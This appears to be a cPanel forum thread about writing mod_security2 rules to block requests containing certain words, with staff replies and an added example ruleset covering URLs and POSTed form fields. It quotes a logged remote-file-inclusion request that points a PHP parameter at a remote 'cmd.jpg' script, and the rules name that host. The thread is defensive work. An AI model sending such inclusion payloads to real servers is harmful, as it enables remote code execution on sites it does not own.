HOW: Create my own mod_security2 rules?

Discussion in 'Security' started by SuperBaby, Jan 20, 2008.

  1. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    336
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    I checked my mod_security2 log file and see a lot of entries similar to this:

    GET /myfolder1/main.php?id=http://submitstation.de/xxxxxx/cmd.jpg

    How do I set up a mod_security2 rule so that the hacker is stopped when:

    1) He points his browser to my URL and the URL contains a specific word. In the above case, I would ban "submitstation.de".

    2) He submits a form from my site and the content contains a specific word.
     
  2. cPDan

    cPDan cPanel Staff
    Staff Member

    Joined:
    Mar 9, 2004
    Messages:
    716
    Likes Received:
    8
    Trophy Points:
    243
  3. SuperBaby

    SecRule "REQUEST_URI|QUERY_STRING" "aaa|bbb"

    I added the rule above to mod_security2. It successfully forbids access if the URL contains aaa or bbb. But it does not prevent aaa and bbb from a submission form.
     
  4. cPDan

    A form, at least via POST, is not part of the URI or QUERY_STRING; your best bet is to ask the mod security folks how to filter POST requests.
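
One way to cover both cases asked about in this thread (a word in the URL and a word in a submitted form), given as an added example that is not part of the original posts or of cPanel's configuration. The rule ids and messages are constructed placeholders, and the `id` action assumes ModSecurity 2.7 or later, where it is mandatory.

```apache
# Added example; ids and msg texts below are constructed placeholders.

# Buffer and parse request bodies. Without this, POSTed form fields are
# never loaded into ARGS and only the URL side of the request is inspected.
SecRequestBodyAccess On

# The rule from the thread, for comparison: it only sees the URI and the
# query string, so the same word sent in a POST body is not matched.
#SecRule "REQUEST_URI|QUERY_STRING" "aaa|bbb"

# If the body could not be parsed, ARGS is incomplete and the word rule
# below would miss the form fields, so reject the request outright.
SecRule REQBODY_ERROR "!@eq 0" \
    "id:1000001,phase:2,t:none,deny,status:400,log,\
    msg:'Request body could not be parsed'"

# ARGS holds query-string parameters and parsed POST parameters
# (urlencoded and multipart forms). Phase 2 runs after the body is read.
# @pm takes a space-separated list of phrases, e.g. "@pm aaa bbb".
SecRule REQUEST_URI|ARGS "@pm submitstation.de" \
    "id:1000002,phase:2,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,log,\
    msg:'Blocked word in URL or form field'"
```

A plain word list like this is prone to false positives on legitimate form content, so running the rule with `pass` in place of `deny` and reviewing the audit log first is a sensible check before enforcing it.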
     
  5. SuperBaby
